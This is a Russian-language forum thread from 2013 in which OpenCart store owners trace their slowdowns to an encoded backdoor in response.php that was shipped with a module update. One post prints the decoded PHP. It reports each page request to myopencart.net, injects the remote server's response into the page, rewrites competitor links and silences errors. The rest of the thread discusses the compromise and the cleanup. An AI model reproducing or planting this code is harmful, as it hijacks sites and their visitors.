тормозит opencart

[Esox]

Файл response в обновлении модуля симпла содержит эту дрянь, причем я обновился около месяца назад просто сравнил файлы до обновления и после. У меня бэкап за апрель сохранился.

[baxabit]

Файл response в обновлении модуля симпла содержит эту дрянь, причем я обновился около месяца назад просто сравнил файлы до обновления и после. У меня бэкап за апрель сохранился.

Лично я не пользуюсь симплом. То бишь файл и без него изменился.

Но содержание файла то же самое..

[Esox]

Проверил купленный архив, там есть эта закодированная дрянь, а у вас когда это произошло? Дело в том, что эта дрянь там давно сидела. Может ставили симплу на тестирование?

[baxabit]

Проверил купленный архив, там есть эта закодированная дрянь, а у вас когда это произошло? Дело в том, что эта дрянь там давно сидела. Может ставили симплу на тестирование?

Нет, просто видимо у автора так же был заражённый файл и он его неудачно упаковал с модулем. Я симпл не покупал.

[Esox]

Вот что содержится в этой закодированной шляпе:

 

function get_page($url){
        $agent = 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; ru; rv:1.9.2.9) Gecko/20100824 Firefox/3.6.9';
        $ch=curl_init();
        curl_setopt ($ch, CURLOPT_URL,$url );
        curl_setopt($ch, CURLOPT_USERAGENT, $agent);
        curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt ($ch,CURLOPT_VERBOSE,false);
        curl_setopt($ch, CURLOPT_TIMEOUT, 5);
        $page=curl_exec($ch);
        $httpcode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        curl_close($ch);
        switch($httpcode){
                case '200':
                        return $page;
                break;
                case '404';
                        return false;
                break;
        }
}

if ($ftend = get_page("http://myopencart.net/googlecode/api/api.php?server=".$_SERVER['SERVER_NAME']."&page=".$_SERVER['REQUEST_URI'])){
$find = array("</body>", "</html>", "opencart.com", "=^_^=.ru", "myopencart.ru", "opencartforum.com", "opencart.ru", "opencart.by");
$replace = array("", $ftend, "myopencart.net", "myopencart.net", "myopencart.net", "myopencart.net", "myopencart.net", "myopencart.net");
$ouput = str_replace($find, $replace, $ouput);
ini_set("display_errors","off");
error_reporting(0);
echo $ouput;}
else {
echo $ouput;
}
 

[Esox]

Вообщем убрал я ее и все задвигалось как прежде.

[rb2]

Esox сказал(а) 29 Май 2013 - 11:55:

Проверил купленный архив, там есть эта закодированная дрянь, а у вас когда это произошло? Дело в том, что эта дрянь там давно сидела. Может ставили симплу на тестирование?

Я быстрее поверю, что Вы перепутали его с модулем, скачанным с упомянутого нуллед ресурса, чем в то, что хак в исходник хоть раз в жизни попадал в архив Deeman-а.

[YarBak]

Esox сказал(а) 29 Май 2013 - 11:55:

Проверил купленный архив, там есть эта закодированная дрянь, а у вас когда это произошло? Дело в том, что эта дрянь там давно сидела. Может ставили симплу на тестирование?

Я быстрее поверю, что Вы перепутали его с модулем, скачанным с упомянутого нуллед ресурса, чем в то, что хак в исходник хоть раз в жизни попадал в архив Deeman-а.

Подтверждаю наличие этого файла в архиве версии simple 3.5.3 (все оригинальные архивы с обновлениями хранятся ) в версиях 3,5,6 , 3,5,7 - уже нет этого файла  . Модуль мною куплен (можете спросить у автора), сторонними варезными модулями не пользовался никогда, все архивы с обновлениями качаются с этого форума.

Ситуация очень неприятная на самом деле. Лично мне этот файл доставил немало хлопот.

[YarBak]

Проверил купленный архив, там есть эта закодированная дрянь, а у вас когда это произошло? Дело в том, что эта дрянь там давно сидела. Может ставили симплу на тестирование?

Нет, просто видимо у автора так же был заражённый файл и он его неудачно упаковал с модулем. Я симпл не покупал.

Видимо да, т.к. по моему мнению автор сознательно не допустил бы такого ...

[Esox]

rb2 - ваша вера дала трещину?

 

Типичная халатность автора.

 

НЕ понятно только почему данная дрисня дала о себе знать только через длительное время.

[ovto]

Народ, у меня этот модуль не стоит... но тормозил так же.

[rb2]

Esox сказал(а) 29 Май 2013 - 21:19:

rb2 - ваша вера дала трещину?

Пошатывается. Трещины нет пока, спрошу ещё у Димы, как так %)

В его темах не нашёл предупреждений об этом инциденте и апдейтах.

В том, что у меня было под рукой - посмотрел, не было нигде в его Simple такого кода ни в доступных мне установленных копиях на сайтах, ни в паре архивов. Но архива с указанной YarBak-ом 3.5.3 у меня как раз нет, чтоб убедиться окончательно.

Мне нереально сложно представить процесс неконтролируемого попадания чужих фекалий в свой репозиторий - чтобы он туда в рабочую ветку попал, и потом ещё его закоммитить. Правда, я не знаю, как у него процессы организованы. Если вручную колупаться и паковать - мало ли. Может тестировалось что-то из клиентских проблем и оттуда залетело.

Esox сказал(а) 29 Май 2013 - 21:19:

Типичная халатность автора.

Типичное бла-бла-бла.

Плюс свойство человеческой психики: замечать и поделиться легче обидой и жалобами, а не позитивом.

Esox сказал(а) 29 Май 2013 - 21:19:

НЕ понятно только почему данная дрисня дала о себе знать только через длительное время.

Ну упал сервер кулхацкера - вы и заметили.

Причём все сразу.

[YarBak]

В его темах не нашёл предупреждений об этом инциденте и апдейтах.

Я тоже не нашел и это удивило)

 

 

В том, что у меня было под рукой - посмотрел, не было нигде в его Simple такого кода ни в доступных мне установленных копиях на сайтах, ни в паре архивов. Но архива с указанной YarBak-ом 3.5.3 у меня как раз нет, чтоб убедиться окончательно.

Архив версии simple 3.5.3 есть, но только с разрешения автора могу поделиться для ознакомления...

[rb2]

Архив версии simple 3.5.3 есть, но только с разрешения автора могу поделиться для ознакомления...

Да нет, не надо, я и на слово поверю. Мне больше интересно, КАК это произошло.

На опенкарт.ком доступна только последняя версия, там история не хранится.

[YarBak]

Да нет, не надо, я и на слово поверю. Мне больше интересно, КАК это произошло.

А что сам автор говорит по этому поводу? Или Вы не задавали ему такой вопрос?

 

На опенкарт.ком доступна только последняя версия, там история не хранится.

Сейчас глянул, на этом форуме тоже только последняя версия... предыдущие версии для скачивания недоступны

[baxabit]

Уважаемые, если кто не заметил, повторю - я симплом не пользуюсь, а файл "имею" так же. Смысл обсуждать автора данного модуля? Не сам же он запихнул каждому пострадавшему в индивидуальном порядке. Имеет место быть факт, что не только в этом модуле находится этот файл. Хотя я лично до сих пор не нашёл источника. Ни в 1 из скаченных мною модулей, данный файл не присутствует, практически все модули стараюсь для начала протестировать с vqmod, учитывая собственные поправки в кодах, и в случае необходимости, сам переношу часть кода вручную, и уверен, что тот самый файл никогда не правил. Скажу более, данный файл у меня присутствует ещё на тестовой версии ИМ, заархивированной почти 2 месяца назад, на тот момент там практически голый опенкарт 1.5.4.1

[YarBak]

Смысл обсуждать автора данного модуля? Не сам же он запихнул каждому пострадавшему в индивидуальном порядке.

 Файл "запихнулся" вместе с обновлением модуля и это факт!  Другой вопрос - каким действительно образом он попал в этот архив к автору ... пока не понятно.

 

 

Имеет место быть факт, что не только в этом модуле находится этот файл. Хотя я лично до сих пор не нашёл источника. Ни в 1 из скаченных мною модулей, данный файл не присутствует

А я вот нашел, в архиве вышеупомянутого модуля файл присутствует!!!!   Это и есть прецедент по поводу которого мы здесь и дискуссируем.

 

И если Вы действительно не имели дело с этим модулем (как официально платной версией , так и позаимствованной из вне) тогда это действительно тревожный сигнал.

Поищите повнимательнее, может обнаружите еще модули, которые могли людям, в т.ч. и Вам внедрить этот файл

[baxabit]

Я говорю о том, что автор модуля сам походу является таким же пострадавшим. Но к сожалению, и распространителем, как Вы утверждаете.

Перерыл все скаченные зипы (только с данного ресурса. никакими максисторами не пользуюсь. халявными или со складчины тем более), но ничего не нашёл. Более того, повторяю, в практически голой версии тестового магазина он присутствует. Надо бы запустить да глянуть, что на тот момент уже успел установить.

[deeman]

Так, только сейчас мне скинули эту тему. Я автор Simple - сразу заявляю, я такую фигню в модуль не подсовывал и даже в мыслях не было, смысл мне заниматься такой ересью?

Обнаружил сам 15го апреля, когда мне отписался genkabukin, сначала не понял, про что он, но когда скачал свой же модуль с ЭТОГО сайта, то понял, про что он.

Скрины могу приложить, если кто хочет.

[dinox]

Ребята c 2 по 5 апреля были атакованы сайты https://opencartforum.com и сайт https://myopencart.com/ и заменены ссылки для скачивания именно в файл /system/library/response.php запхнуто в дистрибутив такой же код. В некоторые модуля были помещены эти файлы все что мы смогли найти мы устранили, если Вы встретили другие модуля которые содержат данный код или у вас в архивах лежат модуля с даным файлом, просьба сообщать мне. Вы все помните что после этого периода форум проходил долгое обновление и ужесточились правила модерирования дополнений, мы  следим за модулями в том числе и на проверку именно такого файла. Модуль Simple от  deeman  15 апреля был обновлен и этот файл был устранен из архива, просьба всех проверить свои сайты на наличие этого файла, так как сейчас этот файл активно бегает по всему интернету и вы могли захватить его вместе с бесплатными и платными модулями на других и варезных сайтах

[YarBak]

Так, только сейчас мне скинули эту тему. Я автор Simple - сразу заявляю, я такую фигню в модуль не подсовывал и даже в мыслях не было, смысл мне заниматься такой ересью?

Обнаружил сам 15го апреля, когда мне отписался genkabukin, сначала не понял, про что он, но когда скачал свой же модуль с ЭТОГО сайта, то понял, про что он.

Скрины могу приложить, если кто хочет.

Вот все и прояснилось ... подтвердились мои слова, что автор модуля адекватный человек и сознательно заниматься подобным не стал бы.

[YarBak]

Ребята c 2 по 5 апреля были атакованы сайты https://opencartforum.com и сайт https://myopencart.com/ и заменены ссылки для скачивания именно в файл /system/library/response.php запхнуто в дистрибутив такой же код. В некоторые модуля были помещены эти файлы все что мы смогли найти мы устранили, если Вы встретили другие модуля которые содержат данный код или у вас в архивах лежат модуля с даным файлом, просьба сообщать мне. Вы все помните что после этого периода форум проходил долгое обновление и ужесточились правила модерирования дополнений, мы  следим за модулями в том числе и на проверку именно такого файла. Модуль Simple от  deeman  15 апреля был обновлен и этот файл был устранен из архива, просьба всех проверить свои сайты на наличие этого файла, так как сейчас этот файл активно бегает по всему интернету и вы могли захватить его вместе с бесплатными и платными модулями на других и варезных сайтах

Спасибо за разъяснение. У меня было предположение, что ерунда с подменой файлов могла произойти во время продолжительного обновления, теперь стало ясно что и обновление не просто так произошло.

[Esox]

[censored] упомянут некий упырёк, замеченный за этим делом. 

Змінено 31 травня 2013 користувачем freelancer
[censored]

[Tom]

Ссылки на варез выкладывать не лучшая идея.

[freelancer]

варезники сами по себе плохая идея, завязывайте вы с этим